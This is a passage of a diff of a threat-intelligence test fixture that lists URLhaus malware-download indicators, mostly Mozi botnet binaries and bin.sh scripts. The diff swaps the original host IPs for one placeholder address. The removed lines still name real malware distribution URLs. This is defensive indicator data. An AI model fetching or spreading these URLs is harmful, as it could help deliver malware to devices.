"http://89.160.20.156:40624/Mozi.m", "scheme": "http", "port": 40624, - "domain": "117.194.167.179", - "full": "http://117.194.167.179:40624/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40624/Mozi.m" }, - "ip": "117.194.167.179" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693779202Z", - "original": "{\"id\":\"961205\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961205/\",\"url\":\"http://117.194.167.179:40624/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.194.167.179\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026951700Z", + "original": "{\"id\":\"961205\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961205/\",\"url\":\"http://89.160.20.156:40624/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16648,18 +16648,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.103.67:41245/Mozi.m", + "original": "http://89.160.20.156:41245/Mozi.m", "scheme": "http", "port": 41245, - "domain": "123.9.103.67", - "full": "http://123.9.103.67:41245/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41245/Mozi.m" }, - "ip": "123.9.103.67" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693782357Z", - "original": "{\"id\":\"961202\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961202/\",\"url\":\"http://123.9.103.67:41245/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.103.67\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026958500Z", + "original": "{\"id\":\"961202\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961202/\",\"url\":\"http://89.160.20.156:41245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16697,18 +16697,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.67.218:48866/Mozi.m", + "original": "http://89.160.20.156:48866/Mozi.m", "scheme": "http", "port": 48866, - "domain": "182.116.67.218", - "full": "http://182.116.67.218:48866/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48866/Mozi.m" }, - "ip": "182.116.67.218" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693785724Z", - "original": "{\"id\":\"961203\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961203/\",\"url\":\"http://182.116.67.218:48866/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.67.218\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026965500Z", + "original": "{\"id\":\"961203\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961203/\",\"url\":\"http://89.160.20.156:48866/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16746,18 +16746,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.142.109:58258/Mozi.m", + "original": "http://89.160.20.156:58258/Mozi.m", "scheme": "http", "port": 58258, - "domain": "125.41.142.109", - "full": "http://125.41.142.109:58258/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58258/Mozi.m" }, - "ip": "125.41.142.109" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693789090Z", - "original": "{\"id\":\"961198\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961198/\",\"url\":\"http://125.41.142.109:58258/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.41.142.109\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026972400Z", + "original": "{\"id\":\"961198\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961198/\",\"url\":\"http://89.160.20.156:58258/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16795,18 +16795,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.9.243.249:34516/Mozi.m", + "original": "http://89.160.20.156:34516/Mozi.m", "scheme": "http", "port": 34516, - "domain": "123.9.243.249", - "full": "http://123.9.243.249:34516/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34516/Mozi.m" }, - "ip": "123.9.243.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693792687Z", - "original": "{\"id\":\"961199\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961199/\",\"url\":\"http://123.9.243.249:34516/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.9.243.249\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026979400Z", + "original": "{\"id\":\"961199\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961199/\",\"url\":\"http://89.160.20.156:34516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16844,18 +16844,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.171.199:47851/Mozi.m", + "original": "http://89.160.20.156:47851/Mozi.m", "scheme": "http", "port": 47851, - "domain": "120.85.171.199", - "full": "http://120.85.171.199:47851/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47851/Mozi.m" }, - "ip": "120.85.171.199" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693796795Z", - "original": "{\"id\":\"961200\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961200/\",\"url\":\"http://120.85.171.199:47851/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.171.199\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026986300Z", + "original": "{\"id\":\"961200\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961200/\",\"url\":\"http://89.160.20.156:47851/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16893,18 +16893,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.122.79:49226/Mozi.m", + "original": "http://89.160.20.156:49226/Mozi.m", "scheme": "http", "port": 49226, - "domain": "186.33.122.79", - "full": "http://186.33.122.79:49226/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49226/Mozi.m" }, - "ip": "186.33.122.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693800702Z", - "original": "{\"id\":\"961201\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961201/\",\"url\":\"http://186.33.122.79:49226/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.122.79\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026993200Z", + "original": "{\"id\":\"961201\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961201/\",\"url\":\"http://89.160.20.156:49226/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16943,18 +16943,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://103.97.139.251:36957/bin.sh", + "original": "http://89.160.20.156:36957/bin.sh", "scheme": "http", "port": 36957, - "domain": "103.97.139.251", - "full": "http://103.97.139.251:36957/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36957/bin.sh" }, - "ip": "103.97.139.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693804088Z", - "original": "{\"id\":\"961197\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961197/\",\"url\":\"http://103.97.139.251:36957/bin.sh\",\"url_status\":\"online\",\"host\":\"103.97.139.251\",\"date_added\":\"2021-01-14 18:34:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.027000300Z", + "original": "{\"id\":\"961197\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961197/\",\"url\":\"http://89.160.20.156:36957/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16992,18 +16992,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.54.114.20:53089/Mozi.m", + "original": "http://89.160.20.156:53089/Mozi.m", "scheme": "http", "port": 53089, - "domain": "115.54.114.20", - "full": "http://115.54.114.20:53089/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53089/Mozi.m" }, - "ip": "115.54.114.20" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693807445Z", - "original": "{\"id\":\"961196\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961196/\",\"url\":\"http://115.54.114.20:53089/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.54.114.20\",\"date_added\":\"2021-01-14 18:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027007200Z", + "original": "{\"id\":\"961196\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961196/\",\"url\":\"http://89.160.20.156:53089/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17041,18 +17041,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.161.49.76:57114/Mozi.m", + "original": "http://89.160.20.156:57114/Mozi.m", "scheme": "http", "port": 57114, - "domain": "103.161.49.76", - "full": "http://103.161.49.76:57114/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57114/Mozi.m" }, - "ip": "103.161.49.76" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693811302Z", - "original": "{\"id\":\"961193\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961193/\",\"url\":\"http://103.161.49.76:57114/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.161.49.76\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027014100Z", + "original": "{\"id\":\"961193\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961193/\",\"url\":\"http://89.160.20.156:57114/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17090,18 +17090,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.56.159.83:33163/Mozi.a", + "original": "http://89.160.20.156:33163/Mozi.a", "scheme": "http", "port": 33163, - "domain": "115.56.159.83", - "full": "http://115.56.159.83:33163/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33163/Mozi.a" }, - "ip": "115.56.159.83" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693814518Z", - "original": "{\"id\":\"961194\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961194/\",\"url\":\"http://115.56.159.83:33163/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.56.159.83\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027021200Z", + "original": "{\"id\":\"961194\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961194/\",\"url\":\"http://89.160.20.156:33163/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17139,18 +17139,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.56.181.246:48557/Mozi.m", + "original": "http://89.160.20.156:48557/Mozi.m", "scheme": "http", "port": 48557, - "domain": "115.56.181.246", - "full": "http://115.56.181.246:48557/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48557/Mozi.m" }, - "ip": "115.56.181.246" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693818285Z", - "original": "{\"id\":\"961195\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961195/\",\"url\":\"http://115.56.181.246:48557/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.56.181.246\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027028100Z", + "original": "{\"id\":\"961195\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961195/\",\"url\":\"http://89.160.20.156:48557/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17189,18 +17189,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://115.58.166.75:59976/bin.sh", + "original": "http://89.160.20.156:59976/bin.sh", "scheme": "http", "port": 59976, - "domain": "115.58.166.75", - "full": "http://115.58.166.75:59976/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59976/bin.sh" }, - "ip": "115.58.166.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693821621Z", - "original": "{\"id\":\"961192\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961192/\",\"url\":\"http://115.58.166.75:59976/bin.sh\",\"url_status\":\"online\",\"host\":\"115.58.166.75\",\"date_added\":\"2021-01-14 18:31:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.027069900Z", + "original": "{\"id\":\"961192\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961192/\",\"url\":\"http://89.160.20.156:59976/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:31:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17238,18 +17238,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://125.44.61.35:48291/i", + "original": "http://89.160.20.156:48291/i", "scheme": "http", "port": 48291, - "domain": "125.44.61.35", - "full": "http://125.44.61.35:48291/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48291/i" }, - "ip": "125.44.61.35" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693824727Z", - "original": "{\"id\":\"961191\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961191/\",\"url\":\"http://125.44.61.35:48291/i\",\"url_status\":\"online\",\"host\":\"125.44.61.35\",\"date_added\":\"2021-01-14 18:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.027077900Z", + "original": "{\"id\":\"961191\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961191/\",\"url\":\"http://89.160.20.156:48291/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17287,18 +17287,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.84.239:45797/Mozi.m", + "original": "http://89.160.20.156:45797/Mozi.m", "scheme": "http", "port": 45797, - "domain": "42.230.84.239", - "full": "http://42.230.84.239:45797/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45797/Mozi.m" }, - "ip": "42.230.84.239" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693828043Z", - "original": "{\"id\":\"961190\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961190/\",\"url\":\"http://42.230.84.239:45797/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.84.239\",\"date_added\":\"2021-01-14 18:21:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027085Z", + "original": "{\"id\":\"961190\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961190/\",\"url\":\"http://89.160.20.156:45797/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17337,18 +17337,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://61.53.222.100:43741/bin.sh", + "original": "http://89.160.20.156:43741/bin.sh", "scheme": "http", "port": 43741, - "domain": "61.53.222.100", - "full": "http://61.53.222.100:43741/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43741/bin.sh" }, - "ip": "61.53.222.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693831289Z", - "original": "{\"id\":\"961186\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961186/\",\"url\":\"http://61.53.222.100:43741/bin.sh\",\"url_status\":\"online\",\"host\":\"61.53.222.100\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.027092Z", + "original": "{\"id\":\"961186\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961186/\",\"url\":\"http://89.160.20.156:43741/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17386,18 +17386,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://59.93.21.58:35446/Mozi.a", + "original": "http://89.160.20.156:35446/Mozi.a", "scheme": "http", "port": 35446, - "domain": "59.93.21.58", - "full": "http://59.93.21.58:35446/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35446/Mozi.a" }, - "ip": "59.93.21.58" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693834485Z", - "original": "{\"id\":\"961187\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961187/\",\"url\":\"http://59.93.21.58:35446/Mozi.a\",\"url_status\":\"offline\",\"host\":\"59.93.21.58\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027099Z", + "original": "{\"id\":\"961187\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961187/\",\"url\":\"http://89.160.20.156:35446/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17435,18 +17435,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.88.231.198:35720/Mozi.m", + "original": "http://89.160.20.156:35720/Mozi.m", "scheme": "http", "port": 35720, - "domain": "59.88.231.198", - "full": "http://59.88.231.198:35720/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35720/Mozi.m" }, - "ip": "59.88.231.198" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693837631Z", - "original": "{\"id\":\"961188\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961188/\",\"url\":\"http://59.88.231.198:35720/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.88.231.198\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027105800Z", + "original": "{\"id\":\"961188\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961188/\",\"url\":\"http://89.160.20.156:35720/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -17484,18 +17484,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.37.115:50501/Mozi.m", + "original": "http://89.160.20.156:50501/Mozi.m", "scheme": "http", "port": 50501, - "domain": "59.96.37.115", - "full": "http://59.96.37.115:50501/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50501/Mozi.m" }, - "ip": "59.96.37.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693840857Z", - "original": "{\"id\":\"961189\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961189/\",\"url\":\"http://59.96.37.115:50501/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.37.115\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027112700Z", + "original": "{\"id\":\"961189\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961189/\",\"url\":\"http://89.160.20.156:50501/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", 